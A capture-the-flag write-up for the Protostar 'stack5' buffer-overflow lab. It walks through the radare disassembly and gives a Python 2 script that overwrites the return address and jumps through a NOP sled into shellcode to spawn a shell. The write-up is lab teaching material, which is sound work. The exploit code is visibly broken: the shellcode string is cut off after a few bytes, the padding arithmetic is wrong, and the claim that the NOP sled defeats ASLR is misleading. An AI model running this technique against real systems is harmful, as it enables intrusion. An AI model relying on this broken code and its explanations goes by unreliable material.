I started solving Protostar from Exploit Exercises and this will be a writeup for stack level 5.

When we check the disassembly of main with radare, disassembly

(Press p in visual graph mode to show the address offset)

Function gets is called for for variable local_10h at esp+0x10. Also, instruction at 0x080483ca shows that stack space for current fucntion’s local variables will be 0x50. Stack will look like this.

stack layout

Now if we write 0x48 bytes, last 4 bytes will be the new return address and code flow will be updated.

Using shellcode

Let us write the shellcode on the stack and update the return address to the starting of this shellcode. If you want to know more about shellcodes check this tutorial.

We will use this shellcode. Note: It is an x86 binary.


  • Write 76 bytes of padding for filling stack space. (0x44 i.e 64 and 12 extra bytes due to memory alignment at 0x080483c7)
  • 4 byte address to starting of shellcode.
  • Shellcode

But problem may arise if ASLR (which is not the case here) is active thus we add nop sled after the return address. This will help us bypass ASLR.

File: exploit.py

#! /usr/bin/python2.7
import sys
import struct

stack = struct.pack("I", 0xbffff78c + 100)

nop = '\x90' * 200
sc = "\x31\xc0\x50\x68\x2f\x2f\x73"\

pad = 'A' * 76

print pad+stack+nop+sc


(python exploit.py 100; cat -) | /opt/protostar/bin/stack5

This will give us a shell.

  • We will place 76 As and return address, nop sled and shellcode on stack.
  • New return address will point to shellcode (or nop sled before shellcode)
  • Upon end of main, code flow will redirect to shellcode thus popping a shell.
  • cat - is to make sure the piped input is not reaching EOF thus preventing the shell from exiting.

Using ret2libc

Will update this soon. Check the exploit here